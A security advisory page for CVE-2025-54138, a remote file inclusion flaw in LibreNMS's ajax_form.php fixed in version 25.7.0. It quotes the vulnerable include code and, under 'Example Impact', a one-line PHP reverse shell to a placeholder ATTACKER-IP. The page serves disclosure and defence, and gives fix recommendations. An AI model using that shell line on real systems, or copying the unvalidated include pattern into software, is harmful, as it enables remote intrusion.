Data

Tools

Indexes

Applications

Experiments

Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS1ncTk2LTh3MzgtaGhqMs4ABKWN

High EPSS: 7.0e-05% (0.00296 Percentile) EPSS:
Permalink JSON

LibreNMS has Authenticated Remote File Inclusion in ajax_form.php that Allows RCE

Affected Packages Affected Versions Fixed Versions
packagist:librenms/librenms < 25.7.0 25.7.0
1 Dependent packages
2 Dependent repositories
51,126 Downloads total

Affected Version Ranges

All affected versions

1.20.1, 1.22.1, 1.30.1, 1.31.1, 1.31.2, 1.31.3, 1.32.1, 1.33.1, 1.36.1, 1.42.1, 1.48.1, 1.50.1, 1.53.1, 1.58.1, 1.62.1, 1.62.2, 1.64.1, 1.65.1, 1.70.0, 1.70.1, 21.1.0, 21.2.0, 21.3.0, 21.4.0, 21.5.0, 21.5.1, 21.6.0, 21.7.0, 21.8.0, 21.9.0, 21.9.1, 21.10.0, 21.10.1, 21.10.2, 21.11.0, 21.12.0, 21.12.1, 22.1.0, 22.2.0, 22.2.1, 22.2.2, 22.3.0, 22.4.0, 22.4.1, 22.5.0, 22.6.0, 22.7.0, 22.8.0, 22.9.0, 22.10.0, 22.11.0, 22.12.0, 23.1.0, 23.1.1, 23.2.0, 23.4.0, 23.4.1, 23.5.0, 23.6.0, 23.7.0, 23.8.0, 23.8.1, 23.8.2, 23.9.0, 23.9.1, 23.10.0, 23.11.0, 24.1.0, 24.2.0, 24.3.0, 24.4.0, 24.4.1, 24.5.0, 24.6.0, 24.7.0, 24.8.0, 24.8.1, 24.9.0, 24.9.1, 24.10.0, 24.10.1, 24.11.0, 24.12.0, 25.1.0, 25.2.0, 25.3.0, 25.4.0, 25.5.0, 25.6.0

All unaffected versions

25.7.0

LibreNMS 25.6.0 contains an architectural vulnerability in the ajax_form.php endpoint that permits Remote File Inclusion based on user-controlled POST input.

The application directly uses the type parameter to dynamically include .inc.php files from the trusted path includes/html/forms/, without validation or allowlisting:

if (file_exists('includes/html/forms/' . $_POST['type'] . '.inc.php')) {
    include_once 'includes/html/forms/' . $_POST['type'] . '.inc.php';
}

This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities.

This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory.

Conditions for Exploitation

  • Attacker must be authenticated
  • Attacker must control a file at includes/html/forms/{type}.inc.php (or symlink)

Example Impact (RCE)

If a PHP file or symlinked shell is staged in the include path, an attacker can achieve full remote code execution under the librenms user context:

<?php system('/bin/bash -c "bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1"'); ?>

https://github.com/user-attachments/assets/deb9ccd2-101c-4172-89b1-b840b7ed3812

Recommended Fix

  • Implement strict allow listing or hardcoded routing instead of dynamically including user-supplied filenames.
  • Avoid passing raw POST input into include_once.
  • Ensure the inclusion path is immutable and outside attacker control (e.g., avoid variable expansion into trusted paths).
References:

Identifiers

GHSA-gq96-8w38-hhj2

CVE-2025-54138

Risk

Severity

High

EPSS

EPSS Percentage: 7.0e-05

EPSS Percentile: 0.00296

Classification

General

Source

GitHub Advisory Database

Origin

Unspecified

Repository

https://github.com/librenms/librenms

Date and time

Published

8 days ago

Updated

6 days ago

API

JSON